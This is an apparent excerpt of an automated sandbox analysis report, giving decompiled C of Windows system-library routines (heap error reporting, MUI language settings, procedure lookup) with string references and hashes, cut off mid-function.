                                                • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                • API String ID: 0-2897834094
                                                • Opcode ID: 672c8b1cf75749e3f739d79e143472a7e65d11cf9311144bfaf7968589730acc
                                                • Instruction ID: 387206be0fa3bc0a790ebff6fa0b60daf7df9d24ca095a6493c50e3303db7147
                                                • Opcode Fuzzy Hash: 672c8b1cf75749e3f739d79e143472a7e65d11cf9311144bfaf7968589730acc
                                                • Instruction Fuzzy Hash: 61612636661580DFD711EB48EA96F2073E4EB04B2272988FAFC0D6F261D6618C44CB1A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 96%
                                                			E00AA3D34(signed int* __ecx) {
                                                				signed int* _v8;
                                                				char _v12;
                                                				signed int* _v16;
                                                				signed int* _v20;
                                                				char _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				char _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				signed int* _v48;
                                                				signed int* _v52;
                                                				signed int _v56;
                                                				signed int _v60;
                                                				char _v68;
                                                				signed int _t140;
                                                				signed int _t161;
                                                				signed int* _t236;
                                                				signed int* _t242;
                                                				signed int* _t243;
                                                				signed int* _t244;
                                                				signed int* _t245;
                                                				signed int _t255;
                                                				void* _t257;
                                                				signed int _t260;
                                                				void* _t262;
                                                				signed int _t264;
                                                				void* _t267;
                                                				signed int _t275;
                                                				signed int* _t276;
                                                				short* _t277;
                                                				signed int* _t278;
                                                				signed int* _t279;
                                                				signed int* _t280;
                                                				short* _t281;
                                                				signed int* _t282;
                                                				short* _t283;
                                                				signed int* _t284;
                                                				void* _t285;
                                                
                                                				_v60 = _v60 | 0xffffffff;
                                                				_t280 = 0;
                                                				_t242 = __ecx;
                                                				_v52 = __ecx;
                                                				_v8 = 0;
                                                				_v20 = 0;
                                                				_v40 = 0;
                                                				_v28 = 0;
                                                				_v32 = 0;
                                                				_v44 = 0;
                                                				_v56 = 0;
                                                				_t275 = 0;
                                                				_v16 = 0;
                                                				if(__ecx == 0) {
                                                					_t280 = 0xc000000d;
                                                					_t140 = 0;
                                                					L50:
                                                					 *_t242 =  *_t242 | 0x00000800;
                                                					_t242[0x13] = _t140;
                                                					_t242[0x16] = _v40;
                                                					_t242[0x18] = _v28;
                                                					_t242[0x14] = _v32;
                                                					_t242[0x17] = _t275;
                                                					_t242[0x15] = _v44;
                                                					_t242[0x11] = _v56;
                                                					_t242[0x12] = _v60;
                                                					return _t280;
                                                				}
                                                				if(E00AA1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                					_v56 = 1;
                                                					if(_v8 != 0) {
                                                						L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                					}
                                                					_v8 = _t280;
                                                				}
                                                				if(E00AA1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                					_v60 =  *_v8;
                                                					L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                					_v8 = _t280;
                                                				}
                                                				if(E00AA1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                					L16:
                                                					if(E00AA1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                						L28:
                                                						if(E00AA1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                							L46:
                                                							_t275 = _v16;
                                                							L47:
                                                							_t161 = 0;
                                                							L48:
                                                							if(_v8 != 0) {
                                                								L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                							}
                                                							_t140 = _v20;
                                                							if(_t140 != 0) {
                                                								if(_t275 != 0) {
                                                									L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                									_t275 = 0;
                                                									_v28 = 0;
                                                									_t140 = _v20;
                                                								}
                                                							}
                                                							goto L50;
                                                						}
                                                						_t167 = _v12;
                                                						_t255 = _v12 + 4;
                                                						_v44 = _t255;
                                                						if(_t255 == 0) {
                                                							_t276 = _t280;
                                                							_v32 = _t280;
                                                						} else {
                                                							_t276 = L00AB4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                							_t167 = _v12;
                                                							_v32 = _t276;
                                                						}
                                                						if(_t276 == 0) {
                                                							_v44 = _t280;
                                                							_t280 = 0xc0000017;
                                                							goto L46;
                                                						} else {
                                                							E00ADF3E0(_t276, _v8, _t167);
                                                							_v48 = _t276;
                                                							_t277 = E00AE1370(_t276, 0xa74e90);
                                                							_pop(_t257);
                                                							if(_t277 == 0) {
                                                								L38:
                                                								_t170 = _v48;
                                                								if( *_v48 != 0) {
                                                									E00ADBB40(0,  &_v68, _t170);
                                                									if(L00AA43C0( &_v68,  &_v24) != 0) {
                                                										_t280 =  &(_t280[0]);
                                                									}
                                                								}
                                                								if(_t280 == 0) {
                                                									_t280 = 0;
                                                									L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                									_v44 = 0;
                                                									_v32 = 0;
                                                								} else {
                                                									_t280 = 0;
                                                								}
                                                								_t174 = _v8;
                                                								if(_v8 != 0) {
                                                									L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                								}
                                                								_v8 = _t280;
                                                								goto L46;
                                                							}
                                                							_t243 = _v48;
                                                							do {
                                                								 *_t277 = 0;
                                                								_t278 = _t277 + 2;
                                                								E00ADBB40(_t257,  &_v68, _t243);
                                                								if(L00AA43C0( &_v68,  &_v24) != 0) {
                                                									_t280 =  &(_t280[0]);
                                                								}
                                                								_t243 = _t278;
                                                								_t277 = E00AE1370(_t278, 0xa74e90);
                                                								_pop(_t257);
                                                							} while (_t277 != 0);
                                                							_v48 = _t243;
                                                							_t242 = _v52;
                                                							goto L38;
                                                						}
                                                					}
                                                					_t191 = _v12;
                                                					_t260 = _v12 + 4;
                                                					_v28 = _t260;
                                                					if(_t260 == 0) {
                                                						_t275 = _t280;
                                                						_v16 = _t280;
                                                					} else {
                                                						_t275 = L00AB4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                						_t191 = _v12;
                                                						_v16 = _t275;
                                                					}
                                                					if(_t275 == 0) {
                                                						_v28 = _t280;
                                                						_t280 = 0xc0000017;
                                                						goto L47;
                                                					} else {
                                                						E00ADF3E0(_t275, _v8, _t191);
                                                						_t285 = _t285 + 0xc;
                                                						_v48 = _t275;
                                                						_t279 = _t280;
                                                						_t281 = E00AE1370(_v16, 0xa74e90);
                                                						_pop(_t262);
                                                						if(_t281 != 0) {
                                                							_t244 = _v48;
                                                							do {
                                                								 *_t281 = 0;
                                                								_t282 = _t281 + 2;
                                                								E00ADBB40(_t262,  &_v68, _t244);
                                                								if(L00AA43C0( &_v68,  &_v24) != 0) {
                                                									_t279 =  &(_t279[0]);
                                                								}
                                                								_t244 = _t282;
                                                								_t281 = E00AE1370(_t282, 0xa74e90);
                                                								_pop(_t262);
                                                							} while (_t281 != 0);
                                                							_v48 = _t244;
                                                							_t242 = _v52;
                                                						}
                                                						_t201 = _v48;
                                                						_t280 = 0;
                                                						if( *_v48 != 0) {
                                                							E00ADBB40(_t262,  &_v68, _t201);
                                                							if(L00AA43C0( &_v68,  &_v24) != 0) {
                                                								_t279 =  &(_t279[0]);
                                                							}
                                                						}
                                                						if(_t279 == 0) {
                                                							L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                							_v28 = _t280;
                                                							_v16 = _t280;
                                                						}
                                                						_t202 = _v8;
                                                						if(_v8 != 0) {
                                                							L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                						}
                                                						_v8 = _t280;
                                                						goto L28;
                                                					}
                                                				}
                                                				_t214 = _v12;
                                                				_t264 = _v12 + 4;
                                                				_v40 = _t264;
                                                				if(_t264 == 0) {
                                                					_v20 = _t280;
                                                				} else {
                                                					_t236 = L00AB4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                					_t280 = _t236;
                                                					_v20 = _t236;
                                                					_t214 = _v12;
                                                				}
                                                				if(_t280 == 0) {
                                                					_t161 = 0;
                                                					_t280 = 0xc0000017;
                                                					_v40 = 0;
                                                					goto L48;
                                                				} else {
                                                					E00ADF3E0(_t280, _v8, _t214);
                                                					_t285 = _t285 + 0xc;
                                                					_v48 = _t280;
                                                					_t283 = E00AE1370(_t280, 0xa74e90);
                                                					_pop(_t267);
                                                					if(_t283 != 0) {
                                                						_t245 = _v48;
                                                						do {
                                                							 *_t283 = 0;
                                                							_t284 = _t283 + 2;
                                                							E00ADBB40(_t267,  &_v68, _t245);
                                                							if(L00AA43C0( &_v68,  &_v24) != 0) {
                                                								_t275 = _t275 + 1;
                                                							}
                                                							_t245 = _t284;
                                                							_t283 = E00AE1370(_t284, 0xa74e90);
                                                							_pop(_t267);
                                                						} while (_t283 != 0);
                                                						_v48 = _t245;
                                                						_t242 = _v52;
                                                					}
                                                					_t224 = _v48;
                                                					_t280 = 0;
                                                					if( *_v48 != 0) {
                                                						E00ADBB40(_t267,  &_v68, _t224);
                                                						if(L00AA43C0( &_v68,  &_v24) != 0) {
                                                							_t275 = _t275 + 1;
                                                						}
                                                					}
                                                					if(_t275 == 0) {
                                                						L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                						_v40 = _t280;
                                                						_v20 = _t280;
                                                					}
                                                					_t225 = _v8;
                                                					if(_v8 != 0) {
                                                						L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                					}
                                                					_v8 = _t280;
                                                					goto L16;
                                                				}
                                                			}


                                                Strings
                                                • Kernel-MUI-Language-Allowed, xrefs: 00AA3DC0
                                                • Kernel-MUI-Language-SKU, xrefs: 00AA3F70
                                                • Kernel-MUI-Language-Disallowed, xrefs: 00AA3E97
                                                • Kernel-MUI-Number-Allowed, xrefs: 00AA3D8C
                                                • WindowsExcludedProcs, xrefs: 00AA3D6F
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                • API String ID: 0-258546922
                                                • Opcode ID: 5cde25176d377eddbc106b68304dcf73c0a946b2d48343880dcecd185e059794
                                                • Instruction ID: 714a27e0609bf7936e90b48214f9a180650c734fb1ecceb6c33c0e6a04d8b7b1
                                                • Opcode Fuzzy Hash: 5cde25176d377eddbc106b68304dcf73c0a946b2d48343880dcecd185e059794
                                                • Instruction Fuzzy Hash: AEF14A72D00618EFCB11DF98CA80AEEBBB9FF49750F15406AF505AB251DB749E00DBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E00A9E620(void* __ecx, short* __edx, short* _a4) {
                                                				char _v16;
                                                				char _v20;
                                                				intOrPtr _v24;
                                                				char* _v28;
                                                				char _v32;
                                                				char _v36;
                                                				char _v44;
                                                				signed int _v48;
                                                				intOrPtr _v52;
                                                				void* _v56;
                                                				void* _v60;
                                                				char _v64;
                                                				void* _v68;
                                                				void* _v76;
                                                				void* _v84;
                                                				signed int _t59;
                                                				signed int _t74;
                                                				signed short* _t75;
                                                				signed int _t76;
                                                				signed short* _t78;
                                                				signed int _t83;
                                                				short* _t93;
                                                				signed short* _t94;
                                                				short* _t96;
                                                				void* _t97;
                                                				signed int _t99;
                                                				void* _t101;
                                                				void* _t102;
                                                
                                                				_t80 = __ecx;
                                                				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                                				_t96 = __edx;
                                                				_v44 = __edx;
                                                				_t78 = 0;
                                                				_v56 = 0;
                                                				if(__ecx == 0 || __edx == 0) {
                                                					L28:
                                                					_t97 = 0xc000000d;
                                                				} else {
                                                					_t93 = _a4;
                                                					if(_t93 == 0) {
                                                						goto L28;
                                                					}
                                                					_t78 = E00A9F358(__ecx, 0xac);
                                                					if(_t78 == 0) {
                                                						_t97 = 0xc0000017;
                                                						L6:
                                                						if(_v56 != 0) {
                                                							_push(_v56);
                                                							E00AD95D0();
                                                						}
                                                						if(_t78 != 0) {
                                                							L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                                						}
                                                						return _t97;
                                                					}
                                                					E00ADFA60(_t78, 0, 0x158);
                                                					_v48 = _v48 & 0x00000000;
                                                					_t102 = _t101 + 0xc;
                                                					 *_t96 = 0;
                                                					 *_t93 = 0;
                                                					E00ADBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                                					_v36 = 0x18;
                                                					_v28 =  &_v44;
                                                					_v64 = 0;
                                                					_push( &_v36);
                                                					_push(0x20019);
                                                					_v32 = 0;
                                                					_push( &_v64);
                                                					_v24 = 0x40;
                                                					_v20 = 0;
                                                					_v16 = 0;
                                                					_t97 = L00AD9600();
                                                					if(_t97 < 0) {
                                                						goto L6;
                                                					}
                                                					E00ADBB40(0,  &_v36, L"InstallLanguageFallback");
                                                					_push(0);
                                                					_v48 = 4;
                                                					_t97 = L00A9F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                                					if(_t97 >= 0) {
                                                						if(_v52 != 1) {
                                                							L17:
                                                							_t97 = 0xc0000001;
                                                							goto L6;
                                                						}
                                                						_t59 =  *_t78 & 0x0000ffff;
                                                						_t94 = _t78;
                                                						_t83 = _t59;
                                                						if(_t59 == 0) {
                                                							L19:
                                                							if(_t83 == 0) {
                                                								L23:
                                                								E00ADBB40(_t83, _t102 + 0x24, _t78);
                                                								if(L00AA43C0( &_v48,  &_v64) == 0) {
                                                									goto L17;
                                                								}
                                                								_t84 = _v48;
                                                								 *_v48 = _v56;
                                                								if( *_t94 != 0) {
                                                									E00ADBB40(_t84, _t102 + 0x24, _t94);
                                                									if(L00AA43C0( &_v48,  &_v64) != 0) {
                                                										 *_a4 = _v56;
                                                									} else {
                                                										_t97 = 0xc0000001;
                                                										 *_v48 = 0;
                                                									}
                                                								}
                                                								goto L6;
                                                							}
                                                							_t83 = _t83 & 0x0000ffff;
                                                							while(_t83 == 0x20) {
                                                								_t94 =  &(_t94[1]);
                                                								_t74 =  *_t94 & 0x0000ffff;
                                                								_t83 = _t74;
                                                								if(_t74 != 0) {
                                                									continue;
                                                								}
                                                								goto L23;
                                                							}
                                                							goto L23;
                                                						} else {
                                                							goto L14;
                                                						}
                                                						while(1) {
                                                							L14:
                                                							_t27 =  &(_t94[1]); // 0x2
                                                							_t75 = _t27;
                                                							if(_t83 == 0x2c) {
                                                								break;
                                                							}
                                                							_t94 = _t75;
                                                							_t76 =  *_t94 & 0x0000ffff;
                                                							_t83 = _t76;
                                                							if(_t76 != 0) {
                                                								continue;
                                                							}
                                                							goto L23;
                                                						}
                                                						 *_t94 = 0;
                                                						_t94 = _t75;
                                                						_t83 =  *_t75 & 0x0000ffff;
                                                						goto L19;
                                                					}
                                                				}
                                                			}


                                                Strings
                                                • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00A9E68C
                                                • InstallLanguageFallback, xrefs: 00A9E6DB
                                                • @, xrefs: 00A9E6C0
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                • API String ID: 0-1757540487
                                                • Opcode ID: 8545d5e231a7c0ad192d1c4a945a6bac74275ea7345f9c3a5b62456f3720204c
                                                • Instruction ID: 25d8684655ea1d60bea892ef2532131a417e43411bad4607a595ba88aae30bfc
                                                • Opcode Fuzzy Hash: 8545d5e231a7c0ad192d1c4a945a6bac74275ea7345f9c3a5b62456f3720204c
                                                • Instruction Fuzzy Hash: E25180769087459BCB14DFA4C480ABBB3E9BF88715F05092EFA85D7241F734DD4487A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 87%
                                                			E00AAD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                                                				signed int _v8;
                                                				intOrPtr _v20;
                                                				signed int _v36;
                                                				intOrPtr* _v40;
                                                				signed int _v44;
                                                				signed int _v48;
                                                				signed char _v52;
                                                				signed int _v60;
                                                				signed int _v64;
                                                				signed int _v68;
                                                				signed int _v72;
                                                				signed int _v76;
                                                				intOrPtr _v80;
                                                				signed int _v84;
                                                				intOrPtr _v100;
                                                				intOrPtr _v104;
                                                				signed int _v108;
                                                				signed int _v112;
                                                				signed int _v116;
                                                				intOrPtr _v120;
                                                				signed int _v132;
                                                				char _v140;
                                                				char _v144;
                                                				char _v157;
                                                				signed int _v164;
                                                				signed int _v168;
                                                				signed int _v169;
                                                				intOrPtr _v176;
                                                				signed int _v180;
                                                				signed int _v184;
                                                				intOrPtr _v188;
                                                				signed int _v192;
                                                				signed int _v200;
                                                				signed int _v208;
                                                				intOrPtr* _v212;
                                                				char _v216;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				signed int _t204;
                                                				void* _t208;
                                                				signed int _t211;
                                                				signed int _t216;
                                                				intOrPtr _t217;
                                                				intOrPtr* _t218;
                                                				signed int _t226;
                                                				signed int _t239;
                                                				signed int* _t247;
                                                				signed int _t249;
                                                				void* _t252;
                                                				signed int _t256;
                                                				signed int _t269;
                                                				signed int _t271;
                                                				signed int _t277;
                                                				signed int _t279;
                                                				intOrPtr _t283;
                                                				signed int _t287;
                                                				signed int _t288;
                                                				void* _t289;
                                                				signed char _t290;
                                                				signed int _t292;
                                                				signed int* _t293;
                                                				signed int _t306;
                                                				signed int _t307;
                                                				signed int _t308;
                                                				signed int _t309;
                                                				signed int _t310;
                                                				intOrPtr _t311;
                                                				intOrPtr _t312;
                                                				signed int _t319;
                                                				signed int _t320;
                                                				signed int* _t324;
                                                				signed int _t337;
                                                				signed int _t338;
                                                				signed int _t339;
                                                				signed int* _t340;
                                                				void* _t341;
                                                				signed int _t344;
                                                				signed int _t348;
                                                				signed int _t349;
                                                				signed int _t351;
                                                				intOrPtr _t353;
                                                				void* _t354;
                                                				signed int _t356;
                                                				signed int _t358;
                                                				intOrPtr _t359;
                                                				signed int _t363;
                                                				signed short* _t365;
                                                				void* _t367;
                                                				intOrPtr _t369;
                                                				void* _t370;
                                                				signed int _t371;
                                                				signed int _t372;
                                                				void* _t374;
                                                				signed int _t376;
                                                				void* _t384;
                                                				signed int _t387;
                                                
                                                				_v8 =  *0xb8d360 ^ _t376;
                                                				_t2 =  &_a20;
                                                				 *_t2 = _a20 & 0x00000001;
                                                				_t287 = _a4;
                                                				_v200 = _a12;
                                                				_t365 = _a8;
                                                				_v212 = _a16;
                                                				_v180 = _a24;
                                                				_v168 = 0;
                                                				_v157 = 0;
                                                				if( *_t2 != 0) {
                                                					__eflags = L00AA6600(0xb852d8);
                                                					if(__eflags == 0) {
                                                						goto L1;
                                                					} else {
                                                						_v188 = 6;
                                                					}
                                                				} else {
                                                					L1:
                                                					_v188 = 9;
                                                				}
                                                				if(_t365 == 0) {
                                                					_v164 = 0;
                                                					goto L5;
                                                				} else {
                                                					_t363 =  *_t365 & 0x0000ffff;
                                                					_t341 = _t363 + 1;
                                                					if((_t365[1] & 0x0000ffff) < _t341) {
                                                						L109:
                                                						__eflags = _t341 - 0x80;
                                                						if(_t341 <= 0x80) {
                                                							_t281 =  &_v140;
                                                							_v164 =  &_v140;
                                                							goto L114;
                                                						} else {
                                                							_t283 =  *0xb87b9c; // 0x0
                                                							_t281 = L00AB4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                                                							_v164 = _t281;
                                                							__eflags = _t281;
                                                							if(_t281 != 0) {
                                                								_v157 = 1;
                                                								L114:
                                                								E00ADF3E0(_t281, _t365[2], _t363);
                                                								_t200 = _v164;
                                                								 *((char*)(_v164 + _t363)) = 0;
                                                								goto L5;
                                                							} else {
                                                								_t204 = 0xc000009a;
                                                								goto L47;
                                                							}
                                                						}
                                                					} else {
                                                						_t200 = _t365[2];
                                                						_v164 = _t200;
                                                						if( *((char*)(_t200 + _t363)) != 0) {
                                                							goto L109;
                                                						} else {
                                                							while(1) {
                                                								L5:
                                                								_t353 = 0;
                                                								_t342 = 0x1000;
                                                								_v176 = 0;
                                                								if(_t287 == 0) {
                                                									break;
                                                								}
                                                								_t384 = _t287 -  *0xb87b90; // 0x770b0000
                                                								if(_t384 == 0) {
                                                									_t353 =  *0xb87b8c; // 0x632a58
                                                									_v176 = _t353;
                                                									_t320 = ( *(_t353 + 0x50))[8];
                                                									_v184 = _t320;
                                                								} else {
                                                									E00AB2280(_t200, 0xb884d8);
                                                									_t277 =  *0xb885f4; // 0x632f48
                                                									_t351 =  *0xb885f8 & 1;
                                                									while(_t277 != 0) {
                                                										_t337 =  *(_t277 - 0x50);
                                                										if(_t337 > _t287) {
                                                											_t338 = _t337 | 0xffffffff;
                                                										} else {
                                                											asm("sbb ecx, ecx");
                                                											_t338 =  ~_t337;
                                                										}
                                                										_t387 = _t338;
                                                										if(_t387 < 0) {
                                                											_t339 =  *_t277;
                                                											__eflags = _t351;
                                                											if(_t351 != 0) {
                                                												__eflags = _t339;
                                                												if(_t339 == 0) {
                                                													goto L16;
                                                												} else {
                                                													goto L118;
                                                												}
                                                												goto L151;
                                                											} else {
                                                												goto L16;
                                                											}
                                                											goto L17;
                                                										} else {
                                                											if(_t387 <= 0) {
                                                												__eflags = _t277;
                                                												if(_t277 != 0) {
                                                													_t340 =  *(_t277 - 0x18);
                                                													_t24 = _t277 - 0x68; // 0x632ee0
                                                													_t353 = _t24;
                                                													_v176 = _t353;
                                                													__eflags = _t340[3] - 0xffffffff;
                                                													if(_t340[3] != 0xffffffff) {
                                                														_t279 =  *_t340;
                                                														__eflags =  *(_t279 - 0x20) & 0x00000020;
                                                														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                                                															asm("lock inc dword [edi+0x9c]");
                                                															_t340 =  *(_t353 + 0x50);
                                                														}
                                                													}
                                                													_v184 = _t340[8];
                                                												}
                                                											} else {
                                                												_t339 =  *(_t277 + 4);
                                                												if(_t351 != 0) {
                                                													__eflags = _t339;
                                                													if(_t339 == 0) {
                                                														goto L16;
                                                													} else {
                                                														L118:
                                                														_t277 = _t277 ^ _t339;
                                                														goto L17;
                                                													}
                                                													goto L151;
                                                												} else {
                                                													L16:
                                                													_t277 = _t339;
                                                												}
                                                												goto L17;
                                                											}
                                                										}
                                                										goto L25;
                                                										L17:
                                                									}
                                                									L25:
                                                									L00AAFFB0(_t287, _t353, 0xb884d8);
                                                									_t320 = _v184;
                                                									_t342 = 0x1000;
                                                								}
                                                								if(_t353 == 0) {
                                                									break;
                                                								} else {
                                                									_t366 = 0;
                                                									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                                                										_t288 = _v164;
                                                										if(_t353 != 0) {
                                                											_t342 = _t288;
                                                											_t374 = E00AECC99(_t353, _t288, _v200, 1,  &_v168);
                                                											if(_t374 >= 0) {
                                                												if(_v184 == 7) {
                                                													__eflags = _a20;
                                                													if(__eflags == 0) {
                                                														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                                                														if(__eflags != 0) {
                                                															_t271 = L00AA6600(0xb852d8);
                                                															__eflags = _t271;
                                                															if(__eflags == 0) {
                                                																_t342 = 0;
                                                																_v169 = _t271;
                                                																_t374 = E00AA7926( *(_t353 + 0x50), 0,  &_v169);
                                                															}
                                                														}
                                                													}
                                                												}
                                                												if(_t374 < 0) {
                                                													_v168 = 0;
                                                												} else {
                                                													if( *0xb8b239 != 0) {
                                                														_t342 =  *(_t353 + 0x18);
                                                														E00B1E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                                                													}
                                                													if( *0xb88472 != 0) {
                                                														_v192 = 0;
                                                														_t342 =  *0x7ffe0330;
                                                														asm("ror edi, cl");
                                                														 *0xb8b1e0( &_v192, _t353, _v168, 0, _v180);
                                                														 *( *0xb8b218 ^  *0x7ffe0330)();
                                                														_t269 = _v192;
                                                														_t353 = _v176;
                                                														__eflags = _t269;
                                                														if(__eflags != 0) {
                                                															_v168 = _t269;
                                                														}
                                                													}
                                                												}
                                                											}
                                                											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                                                												_t366 = 0xc000007a;
                                                											}
                                                											_t247 =  *(_t353 + 0x50);
                                                											if(_t247[3] == 0xffffffff) {
                                                												L40:
                                                												if(_t366 == 0xc000007a) {
                                                													__eflags = _t288;
                                                													if(_t288 == 0) {
                                                														goto L136;
                                                													} else {
                                                														_t366 = 0xc0000139;
                                                													}
                                                													goto L54;
                                                												}
                                                											} else {
                                                												_t249 =  *_t247;
                                                												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                                                													goto L40;
                                                												} else {
                                                													_t250 = _t249 | 0xffffffff;
                                                													asm("lock xadd [edi+0x9c], eax");
                                                													if((_t249 | 0xffffffff) == 0) {
                                                														E00AB2280(_t250, 0xb884d8);
                                                														_t342 =  *(_t353 + 0x54);
                                                														_t165 = _t353 + 0x54; // 0x54
                                                														_t252 = _t165;
                                                														__eflags =  *(_t342 + 4) - _t252;
                                                														if( *(_t342 + 4) != _t252) {
                                                															L135:
                                                															asm("int 0x29");
                                                															L136:
                                                															_t288 = _v200;
                                                															_t366 = 0xc0000138;
                                                															L54:
                                                															_t342 = _t288;
                                                															L00AD3898(0, _t288, _t366);
                                                														} else {
                                                															_t324 =  *(_t252 + 4);
                                                															__eflags =  *_t324 - _t252;
                                                															if( *_t324 != _t252) {
                                                																goto L135;
                                                															} else {
                                                																 *_t324 = _t342;
                                                																 *(_t342 + 4) = _t324;
                                                																_t293 =  *(_t353 + 0x50);
                                                																_v180 =  *_t293;
                                                																L00AAFFB0(_t293, _t353, 0xb884d8);
                                                																__eflags =  *((short*)(_t353 + 0x3a));
                                                																if( *((short*)(_t353 + 0x3a)) != 0) {
                                                																	_t342 = 0;
                                                																	__eflags = 0;
                                                																	L00AD37F5(_t353, 0);
                                                																}
                                                																E00AD0413(_t353);
                                                																_t256 =  *(_t353 + 0x48);
                                                																__eflags = _t256;
                                                																if(_t256 != 0) {
                                                																	__eflags = _t256 - 0xffffffff;
                                                																	if(_t256 != 0xffffffff) {
                                                																		E00AC9B10(_t256);
                                                																	}
                                                																}
                                                																__eflags =  *(_t353 + 0x28);
                                                																if( *(_t353 + 0x28) != 0) {
                                                																	_t174 = _t353 + 0x24; // 0x24
                                                																	E00AC02D6(_t174);
                                                																}
                                                																L00AB77F0( *0xb87b98, 0, _t353);
                                                																__eflags = _v180 - _t293;
                                                																if(__eflags == 0) {
                                                																	E00ACC277(_t293, _t366);
                                                																}
                                                																_t288 = _v164;
                                                																goto L40;
                                                															}
                                                														}
                                                													} else {
                                                														goto L40;
                                                													}
                                                												}
                                                											}
                                                										}
                                                									} else {
                                                										L00AAEC7F(_t353);
                                                										L00AC19B8(_t287, 0, _t353, 0);
                                                										_t200 = E00A9F4E3(__eflags);
                                                										continue;
                                                									}
                                                								}
                                                								L41:
                                                								if(_v157 != 0) {
                                                									L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                                                								}
                                                								if(_t366 < 0 || ( *0xb8b2f8 |  *0xb8b2fc) == 0 || ( *0xb8b2e4 & 0x00000001) != 0) {
                                                									L46:
                                                									 *_v212 = _v168;
                                                									_t204 = _t366;
                                                									L47:
                                                									_pop(_t354);
                                                									_pop(_t367);
                                                									_pop(_t289);
                                                									return L00ADB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                                                								} else {
                                                									_v200 = 0;
                                                									if(( *0xb8b2ec >> 0x00000008 & 0x00000003) == 3) {
                                                										_t355 = _v168;
                                                										_t342 =  &_v208;
                                                										_t208 = E00B46B68(_v168,  &_v208, _v168, __eflags);
                                                										__eflags = _t208 - 1;
                                                										if(_t208 == 1) {
                                                											goto L46;
                                                										} else {
                                                											__eflags = _v208 & 0x00000010;
                                                											if((_v208 & 0x00000010) == 0) {
                                                												goto L46;
                                                											} else {
                                                												_t342 = 4;
                                                												_t366 = E00B46AEB(_t355, 4,  &_v216);
                                                												__eflags = _t366;
                                                												if(_t366 >= 0) {
                                                													goto L46;
                                                												} else {
                                                													asm("int 0x29");
                                                													_t356 = 0;
                                                													_v44 = 0;
                                                													_t290 = _v52;
                                                													__eflags = 0;
                                                													if(0 == 0) {
                                                														L108:
                                                														_t356 = 0;
                                                														_v44 = 0;
                                                														goto L63;
                                                													} else {
                                                														__eflags = 0;
                                                														if(0 < 0) {
                                                															goto L108;
                                                														}
                                                														L63:
                                                														_v112 = _t356;
                                                														__eflags = _t356;
